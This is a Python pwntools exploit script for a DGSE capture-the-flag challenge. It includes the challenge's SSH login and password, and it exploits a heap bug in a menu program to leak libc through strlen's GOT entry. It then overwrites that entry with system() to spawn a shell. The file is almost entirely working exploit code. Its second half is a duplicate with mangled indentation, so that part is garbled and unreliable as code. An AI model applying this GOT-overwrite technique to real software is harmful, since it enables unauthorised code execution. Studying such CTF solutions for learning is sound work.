BZHugs/stage3.py

## stage3.py
# coding: utf8

'''
ssh defi3.challengecybersec.fr -l defi3 -p 2222

mot de passe : DGSE{?uo20tPO4(o=A=dX3njr2y{emZQodR}

'''
from pwn import *
import struct

def rq(v):
    return struct.unpack("<Q", v[:8])[0]

def start():
    global p, libc
    try:
        p.close()
    except:
        pass
    p = process(['./prog.bin','16'])
    pause()
    print p.recvuntil("sortie\n")

def create(nom, id):
    p.sendline("1")
    p.sendline(nom)
    p.sendline(id)
    dumb= p.recvuntil("sortie\n")

def show():
    p.sendline("2")
    a=p.recvuntil("sortie\n")
    return a

def delete(ele,idornom):
    p.sendline("3")
    p.sendline(str(ele))
    p.sendline(str(idornom))
    dumb = p.recvuntil("sortie\n")


def changenom(ele,nom):
    p.sendline("4")
    p.sendline(str(ele))
    p.send(nom)
    dumb = p.recvuntil("sortie\n")

def changeid(ele,id):
    p.sendline("5")
    p.sendline(str(ele))
    p.sendline(id)
    dumb = p.recvuntil("sortie\n")

def close():
    p.sendline("6")
    p.recv(500)
    p.close()


start()
create("a", "b")
delete(0, 2)
create("c", "d")
changenom(0, "\x30\x20\x60\n") #0x602030 GOT strlen

tmp = show()

'''
defi3@AttrapeLeDrapeau:~$ readelf -s /lib/x86_64-linux-gnu/libc-2.24.so | grep system@
  1353: 000000000003f480    45 FUNC    WEAK   DEFAULT   13 system@@GLIBC_2.2.5
defi3@AttrapeLeDrapeau:~$ readelf -s /lib/x86_64-linux-gnu/libc-2.24.so | grep strlen@
   777: 0000000000080650   412 FUNC    GLOBAL DEFAULT   13 strlen@@GLIBC_2.2.5
'''

LIBC_system_offset = 0x3f480
LIBC_strlen_offset = 0x80650

LIBC_strlen = rq(tmp.split("élément[1]\t-> nom : ")[1].split('\n')[0]+"\x00"*2)
LIBC_base = LIBC_strlen - LIBC_strlen_offset
LIBC_system = LIBC_base + LIBC_system_offset

print "LIBC_strlen\t-> ", hex(LIBC_strlen)
print "LIBC_base\t-> ", hex(LIBC_base)
print "LIBC_system\t-> ", hex(LIBC_system)

changenom(1, p64(LIBC_system)[:-2]+"\n")

p.sendline("/bin/sh")
p.interactive()
	# coding: utf8

	'''
	ssh defi3.challengecybersec.fr -l defi3 -p 2222

	mot de passe : DGSE{?uo20tPO4(o=A=dX3njr2y{emZQodR}

	'''
	from pwn import *
	import struct

	def rq(v):
	return struct.unpack("<Q", v[:8])[0]

	def start():
	global p, libc
	try:
	p.close()
	except:
	pass
	p = process(['./prog.bin','16'])
	pause()
	print p.recvuntil("sortie\n")

	def create(nom, id):
	p.sendline("1")
	p.sendline(nom)
	p.sendline(id)
	dumb= p.recvuntil("sortie\n")

	def show():
	p.sendline("2")
	a=p.recvuntil("sortie\n")
	return a

	def delete(ele,idornom):
	p.sendline("3")
	p.sendline(str(ele))
	p.sendline(str(idornom))
	dumb = p.recvuntil("sortie\n")


	def changenom(ele,nom):
	p.sendline("4")
	p.sendline(str(ele))
	p.send(nom)
	dumb = p.recvuntil("sortie\n")

	def changeid(ele,id):
	p.sendline("5")
	p.sendline(str(ele))
	p.sendline(id)
	dumb = p.recvuntil("sortie\n")

	def close():
	p.sendline("6")
	p.recv(500)
	p.close()


	start()
	create("a", "b")
	delete(0, 2)
	create("c", "d")
	changenom(0, "\x30\x20\x60\n") #0x602030 GOT strlen

	tmp = show()

	'''
	defi3@AttrapeLeDrapeau:~$ readelf -s /lib/x86_64-linux-gnu/libc-2.24.so \| grep system@
	1353: 000000000003f480 45 FUNC WEAK DEFAULT 13 system@@GLIBC_2.2.5
	defi3@AttrapeLeDrapeau:~$ readelf -s /lib/x86_64-linux-gnu/libc-2.24.so \| grep strlen@
	777: 0000000000080650 412 FUNC GLOBAL DEFAULT 13 strlen@@GLIBC_2.2.5
	'''

	LIBC_system_offset = 0x3f480
	LIBC_strlen_offset = 0x80650

	LIBC_strlen = rq(tmp.split("élément[1]\t-> nom : ")[1].split('\n')[0]+"\x00"*2)
	LIBC_base = LIBC_strlen - LIBC_strlen_offset
	LIBC_system = LIBC_base + LIBC_system_offset

	print "LIBC_strlen\t-> ", hex(LIBC_strlen)
	print "LIBC_base\t-> ", hex(LIBC_base)
	print "LIBC_system\t-> ", hex(LIBC_system)

	changenom(1, p64(LIBC_system)[:-2]+"\n")

	p.sendline("/bin/sh")
	p.interactive()